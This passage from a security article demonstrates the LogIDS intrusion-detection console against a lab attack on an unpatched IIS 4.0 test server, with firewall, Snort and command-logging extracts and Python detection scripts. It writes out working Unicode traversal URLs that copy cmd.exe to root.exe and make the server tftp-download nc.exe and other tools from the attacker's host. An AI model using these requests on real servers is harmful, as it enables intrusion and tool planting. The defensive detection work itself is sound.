OK, now that we have looked at the ins and outs of LogIDS, let's see it in action. For the occasion, I set up a test machine with the following security measures: LogAgent 5.0 Pro (running as a service with the SIDTk 1.0 enabled), ComLog 1.05, Snort 1.9.1, ZoneAlarm Pro 2.6.362, and LogIDS 2.0 Open Source and Pro on top of it all, everything running on a freshly installed NT4 SP6a partition. Oh yeah, I also installed IIS 4.0 with its default install, unpatched, for good measure (grin). No, seriously, what I wanted was to set up a vulnerable server that would fall victim to the same kind of attack I performed in my paper "Autopsy of a successful intrusion (well, two actually)": the well-known UNICODE directory traversal vulnerability, followed by copying some files that could lead to further exploitation. As a matter of fact, with my current configuration I had to specially configure ZoneAlarm so that the attack would go through without a problem, even though it was well monitored, as you will see. Let me recall, for those who haven't read my paper, that one of these intrusions went practically undetected by the security measures in place, even though staff members saw visual signs of our intrusion, and we (me and a colleague at the time) were even caught in the act by a staff member because we had been reckless with a remote-GUI shell session. However, the whole incident went completely unreported until we produced our own report for our penetration testing contract. That is to say, too often companies rely only on a couple of security gimmicks that provide a false sense of security, and on staff that is not properly trained to recognize a serious security breach when they have the chance to see one.
Like I said before, I see LogIDS as some kind of mega-IDS, since it benefits from the specific strengths of numerous security tools to detect intrusions. One of the downsides of traditional network-based intrusion detection systems is that they generate false results, which cause either undetected intrusions or false alerts that, over time, tend to lessen the level of attention dedicated to these alerts. Because LogIDS does not rely on a single intrusion detection technique, the more illicit activity is going on, the more log activity it will generate across your security architecture. By properly configuring your rules file to separate the wheat from the chaff, you get a decent display (over which you have great control of the fields you actually care to see) that gives you the information you need to understand what triggered the log, and with sound alerts properly set, when your monitoring console starts beeping like there's a fire, that is definitely a good hint that something wrong is going on.
So I started my little attack scenario by performing a simple port scan of my test machine TESTBED. ZoneAlarm and Snort immediately started to produce log data in their respective directories, under the watchful eye of LogAgent, which diligently forwarded this precious cargo to the scrutiny of LogIDS. I used a slightly modified version of the rules and filters we have seen before, which you can find in the appendices, and it did the job remarkably well for such a simple test. Under this configuration, LogIDS frenetically started to display the data from these two log files in the appropriate windows (the window for the host concerned and the one for its associated subnet), emitting a series of beeps that should definitely alert anyone within hearing distance of the machine. (Note: it is recommended that you set the wav files for the Exclamation and Default sound events (Control Panel->Sound) to none, so that when a sound is emitted it comes from the PC speaker; this performs better than playing wav files.) My girlfriend thought I had hit a big bug that crashed the PC the first time she heard it, while I was developing my app and feeding it sample logs to trigger alerts. Figures 4 and 5 show these windows under the scan.
Here is a very small sample of the logs collected from ZoneAlarm and Snort during this phase of the attack:
ZoneAlarm ZALog.txt file:
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:30 -4:00 GMT,10.0.0.1:0,10.0.0.2:0,ICMP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4552,10.0.0.2:21,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4553,10.0.0.2:22,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4554,10.0.0.2:23,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4556,10.0.0.2:42,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4557,10.0.0.2:53,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4558,10.0.0.2:69,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4559,10.0.0.2:79,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4561,10.0.0.2:110,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4562,10.0.0.2:111,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4564,10.0.0.2:143,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,10.0.0.1:4565,10.0.0.2:1080,TCP
Snort's alert.ids file:
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,[**] [1:474:1] ICMP superscan echo [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,10/23-00:18:03.130388 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3C
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,10.0.0.1 -> 10.0.0.2 ICMP TTL:128 TOS:0x0 ID:40079 IpLen:20 DgmLen:36
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:4,Type:8 Code:0 ID:1024 Seq:512 ECHO
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:5,[**] [1:615:3] SCAN SOCKS Proxy attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:5,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:5,10/23-00:18:04.686272 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,10.0.0.1:4526 -> 10.0.0.2:1080 TCP TTL:128 TOS:0x0 ID:40105 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,******S* Seq: 0xE729533 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,[**] [1:620:2] SCAN Proxy (8080) attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,10/23-00:18:05.456182 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,10.0.0.1:4540 -> 10.0.0.2:8080 TCP TTL:128 TOS:0x0 ID:40119 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,******S* Seq: 0xE808BA9 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[**] [1:615:3] SCAN SOCKS Proxy attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,10/23-00:18:07.619270 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,10.0.0.1:4526 -> 10.0.0.2:1080 TCP TTL:128 TOS:0x0 ID:40142 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,******S* Seq: 0xE729533 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[**] [1:620:2] SCAN Proxy (8080) attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,10/23-00:18:08.419336 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,10.0.0.1:4540 -> 10.0.0.2:8080 TCP TTL:128 TOS:0x0 ID:40158 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,******S* Seq: 0xE808BA9 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,[**] [1:615:3] SCAN SOCKS Proxy attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,10/23-00:18:13.618979 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,10.0.0.1:4526 -> 10.0.0.2:1080 TCP TTL:128 TOS:0x0 ID:40183 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,******S* Seq: 0xE729533 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,TCP Options (4) => MSS: 1460 NOP NOP SackOK
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,[**] [1:620:2] SCAN Proxy (8080) attempt [**]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,[Classification: Attempted Information Leak] [Priority: 2]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,10/23-00:18:14.419263 0:10:60:58:4:33 -> 0:50:BA:C9:BE:DA type:0x800 len:0x3E
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,10.0.0.1:4540 -> 10.0.0.2:8080 TCP TTL:128 TOS:0x0 ID:40199 IpLen:20 DgmLen:48 DF
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,******S* Seq: 0xE808BA9 Ack: 0x0 Win: 0x4000 TcpLen: 28
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:16,TCP Options (4) => MSS: 1460 NOP NOP SackOK
And here is what the snortlite.log digest produced by LogAgent 5.0 Pro looks like:
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:5, [1:474:1] ICMP superscan echo , Attempted Information Leak ,10/23,00:18:03.130388, 2 ,10.0.0.1,10.0.0.2,ICMP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:18:04.686272, 2 ,10.0.0.1:4526,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:18:05.456182, 2 ,10.0.0.1:4540,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:8, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:18:07.619270, 2 ,10.0.0.1:4526,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:18:08.419336, 2 ,10.0.0.1:4540,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:15, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:18:13.618979, 2 ,10.0.0.1:4526,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:32, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:18:14.419263, 2 ,10.0.0.1:4540,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33, [1:474:1] ICMP superscan echo , Attempted Information Leak ,10/23,00:21:30.581990, 2 ,10.0.0.1,10.0.0.2,ICMP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:21:31.828234, 2 ,10.0.0.1:4565,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:35, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:21:32.598169, 2 ,10.0.0.1:4579,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:35, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:21:34.752623, 2 ,10.0.0.1:4565,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:22:59, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:21:35.552538, 2 ,10.0.0.1:4579,10.0.0.2:8080,TCP
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:22:59, [1:615:3] SCAN SOCKS Proxy attempt , Attempted Information Leak ,10/23,00:21:40.751327, 2 ,10.0.0.1:4565,10.0.0.2:1080,TCP,[Xref => url help.undernet.org/proxyscan/]
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:22:59, [1:620:2] SCAN Proxy (8080) attempt , Attempted Information Leak ,10/23,00:21:41.551223, 2 ,10.0.0.1:4579,10.0.0.2:8080,TCP
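To make the correlation concrete, here is an added example (not code from the original article, nor from the LogIDS or LogAgent projects) that parses LogAgent-forwarded ZoneAlarm FWIN records and snortlite digest lines and flags a source that probed several ports within a short window, attaching Snort's scan alerts from the same source as corroboration. The five-field LogAgent header (ip, host, user, date, time) and the field orders follow the extracts above; the min_ports and window_seconds thresholds and the generated source ports in the sample records are assumptions.

```python
"""Added example (not LogIDS or LogAgent code): correlate LogAgent-forwarded
ZoneAlarm FWIN records with snortlite digest lines to flag a port scan."""
from collections import defaultdict
from datetime import datetime

def split_logagent(line):
    """LogAgent prefixes each forwarded line with ip,host,user,date,time; return (ts, payload)."""
    _ip, _host, _user, date, time, payload = line.split(",", 5)
    return datetime.strptime(f"{date} {time}", "%Y/%m/%d %H:%M:%S"), payload

def parse_fwin(payload):
    """ZoneAlarm 'FWIN,date,time tz,src:port,dst:port,proto' -> (src_ip, dst_port, proto), else None."""
    f = payload.split(",")
    if f[0] != "FWIN":
        return None
    return f[3].rsplit(":", 1)[0], int(f[4].rsplit(":", 1)[1]), f[5]

def parse_snortlite(payload):
    """snortlite 'msg, class, date, time, priority, src, dst, proto[, xref]' -> (msg, priority, src_ip)."""
    f = [x.strip() for x in payload.split(",")]
    return f[0], int(f[4]), f[5].rsplit(":", 1)[0]

def detect_scans(zonealarm_lines, snortlite_lines, min_ports=5, window_seconds=10):
    """Flag a source whose blocked inbound TCP/UDP connections hit at least min_ports
    distinct ports within window_seconds, and attach Snort scan alerts from that source."""
    hits, snort = defaultdict(list), defaultdict(set)
    for line in zonealarm_lines:
        ts, payload = split_logagent(line)
        rec = parse_fwin(payload)
        if rec and rec[2] in ("TCP", "UDP"):         # ICMP carries no port to count
            hits[rec[0]].append((ts, rec[1]))
    for line in snortlite_lines:
        msg, _priority, src = parse_snortlite(split_logagent(line)[1])
        if "scan" in msg.lower():
            snort[src].add(msg)
    alerts = []
    for src, events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):          # sliding window over time-ordered hits
            ports = {p for t, p in events[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(ports) >= min_ports:
                alerts.append({"src": src, "ports": sorted(ports), "snort": sorted(snort[src])})
                break
    return alerts

# Sample records modelled on the ZoneAlarm extract above (source ports constructed) and
# one snortlite line copied from it.
ZA = ["10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:21:33,FWIN,2003/10/23,00:21:32 -4:00 GMT,"
      f"10.0.0.1:{4550 + p},10.0.0.2:{p},TCP" for p in (21, 22, 23, 42, 53)]
SL = ["10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:18:6, [1:615:3] SCAN SOCKS Proxy attempt ,"
      " Attempted Information Leak ,10/23,00:18:04.686272, 2 ,10.0.0.1:4526,10.0.0.2:1080,TCP,"
      "[Xref => url help.undernet.org/proxyscan/]"]
```

Calling detect_scans(ZA, SL) returns one alert for 10.0.0.1 listing the five probed ports and the corroborating Snort message; the same five hits spread over more than ten seconds produce none.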
As I said, besides showing intense activity for the network items involved in the attack, LogIDS produced a series of sounds that made it ring almost like an alarm bell. That should have gotten your attention. Now, here comes the rest of the attack. I moved on to the UNICODE vulnerability right away, using tftp to place the tools nc.exe, hk2.exe, whoami.exe and pulist.exe in the \scripts folder of the web root. I did this by issuing a series of commands to the server through my web browser, after copying the command prompt (in fact the ComLog binary) to the scripts folder under the name root.exe, as is commonly seen in worm or cracker behaviour. But first, I typed in a dir command, just to see if the attack worked.
LogIDS 2.0 Pro supports clickable buttons under the action icons (limited to 32 items; I can easily program more if needed). Clicking one of these buttons opens a bigger viewing window for the associated network item. All the windows are synchronized. Figure 7 shows what happens when clicking on item 10.0.0.2.
So, the exploit seems to work very well, and now I can copy what the attacker thinks is cmd.exe (really ComLog) to root.exe for easier access:
http://10.0.0.2/scripts/..%c0%ad../winnt/system32/cmd.exe?/c+copy+\winnt\system32\cmd.exe+root.exe
ComLog's ugmgifrj.clg file (ComLog generates random filenames so that unsuspecting intruders do not notice its logs):
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:16,Thu Oct 23 00:32:13 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,Microsoft(R) Windows NT(TM)
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,(C) Copyright 1985-1996 Microsoft Corp.
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,Thu Oct 23 00:32:13 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,D:/InetPub/scripts>Thu Oct 23 00:32:13 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,copy /winnt/system32/cmd.exe root.exe
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,Thu Oct 23 00:32:14 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,1 file(s) copied.
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,Thu Oct 23 00:32:14 2003
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,exit
which gives the following when focusing only on the 'line' field (note that ComLog adds a timestamp at each command for easier forensic analysis):
Thu Oct 23 00:32:13 2003
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
Thu Oct 23 00:32:13 2003
D:/Inetpub/scripts>Thu Oct 23 00:32:13 2003
copy /winnt/system32/cmd.exe root.exe
Thu Oct 23 00:32:14 2003
1 file(s) copied.
Thu Oct 23 00:32:14 2003
exit
Such a log file exists, and has been taken into account by LogIDS, for each of the commands I issued to download my tools (the next figures show the rest of the attack from the perspective of the LogIDS ComLog textboxes). For forensics alone, such log files are invaluable, since this data was previously not available in the analysis game: determining the complete actions of an intruder on a machine could mean a complete hard-disk analysis in order to try to identify the files he could have accessed, reverse-engineering downloaded binaries, etc. Now you know exactly what happened, as it happened. Let's go further in our little test case.
The next step for me is to download some hacking tools, so I keep sending my commands using URLs like these:
http://10.0.0.2/scripts/root.exe?/c+tftp+-i+10.0.0.1+get+hk2.exe
http://10.0.0.2/scripts/root.exe?/c+tftp+-i+10.0.0.1+get+nc.exe
http://10.0.0.2/scripts/root.exe?/c+tftp+-i+10.0.0.1+get+whoami.exe
http://10.0.0.2/scripts/root.exe?/c+tftp+-i+10.0.0.1+get+pulist.exe
repeated for each file I want to download. I could have pursued this attack further, but I think I have proved my point and it would not be useful to hack my poor server any more. As you can see, besides detecting and reporting every command passed by the attacker, we are able to monitor the complete attack from its earliest stages. You can also see the logs and action icons of some modules of the SIDTk reporting on some aspects of the attack.
Here are some pieces of processes.log, from LogProc 1.0 (SIDTk 1.0):
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:41:44,Unknown process detected,TFTP.EXE,D:\WINNT\system32\TFTP.EXE,
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:27,Unknown process detected,root.exe,D:\InetPub\scripts\root.exe,
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:27,Unknown process detected,TFTP.EXE,D:\WINNT\system32\TFTP.EXE,
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:47,Unknown process detected,root.exe,D:\InetPub\scripts\root.exe,
10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:47,Unknown process detected,TFTP.EXE,D:\WINNT\system32\TFTP.EXE,
So at this point, I think we can classify this attack as definitely detected; I don't have to go further to prove my point, and we have details about it like never before, at the very moment it happens. Don't forget that if you need to consult your logs afterwards, they are located in the \logids\log\backup directory.
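The host-side records above (ComLog's 'line' field and LogProc's processes.log) lend themselves to the same treatment; here is an added example (not code from the original article, ComLog, LogProc or LogIDS) that strips the LogAgent header and flags the signs of this intrusion a defender would want a rule for: a tftp transfer onto the server, cmd.exe copied under a new name, and unknown processes launched from the IIS scripts directory. The scripts path, the two regular-expression rules and the one constructed tftp record are assumptions; the other sample records are copied from the extracts above.

```python
"""Added example (not ComLog, LogProc or LogIDS code): strip the LogAgent header from
ComLog .clg and LogProc processes.log records and flag the host-side signs of the
intrusion shown above (tool transfer with tftp, cmd.exe copied into the web tree,
unknown processes running from the IIS scripts directory)."""
import re

WEB_SCRIPT_DIRS = {r"d:\inetpub\scripts"}   # assumed IIS layout, taken from the sample paths above
COMLOG_RULES = [   # (pattern, reason) applied to the ComLog 'line' field, case-insensitively
    (re.compile(r"\btftp\b.*\s-i\s.*\bget\b", re.I), "tftp binary transfer onto the server"),
    (re.compile(r"\bcopy\b.*\bcmd\.exe\b", re.I), "cmd.exe copied (shell exposed under a new name)"),
]

def line_field(record):
    """Drop the 5-field LogAgent header (ip,host,user,date,time); return the original log line."""
    return record.split(",", 5)[5].strip()

def flag_comlog(clg_records):
    """Return [(command_text, reason)] for every ComLog line that matches a rule."""
    findings = []
    for rec in clg_records:
        text = line_field(rec)
        reasons = [why for pattern, why in COMLOG_RULES if pattern.search(text)]
        if reasons:
            findings.append((text, reasons[0]))
    return findings

def flag_logproc(proc_records):
    """Return [(process, path, reason)] for 'Unknown process detected' entries worth a look."""
    findings = []
    for rec in proc_records:
        fields = line_field(rec).split(",")
        if fields[0] != "Unknown process detected":
            continue
        name, path = fields[1], fields[2]
        folder = path.lower().replace("/", "\\").rsplit("\\", 1)[0]
        if folder in WEB_SCRIPT_DIRS:
            findings.append((name, path, "executable launched from the web scripts directory"))
        elif name.lower() == "tftp.exe":
            findings.append((name, path, "tftp client started on a web server"))
    return findings

# ComLog records copied from the .clg extract above, plus one constructed record for a tftp command.
CLG = [
    "10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,D:/InetPub/scripts>Thu Oct 23 00:32:13 2003",
    "10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,copy /winnt/system32/cmd.exe root.exe",
    "10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:32:17,1 file(s) copied.",
    "10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:41:44,tftp -i 10.0.0.1 get nc.exe",   # constructed
]
# LogProc records copied from the processes.log extract above.
PROC = [
    r"10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:41:44,Unknown process detected,TFTP.EXE,D:\WINNT\system32\TFTP.EXE,",
    r"10.0.0.2,testbed,LogAgent_USR,2003/10/23,0:42:27,Unknown process detected,root.exe,D:\InetPub\scripts\root.exe,",
]
```

flag_comlog(CLG) returns the copy and tftp commands with their reasons while ignoring the prompt and output lines; flag_logproc(PROC) flags TFTP.EXE and the root.exe running from the scripts directory.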
9. Version history
11. Conclusion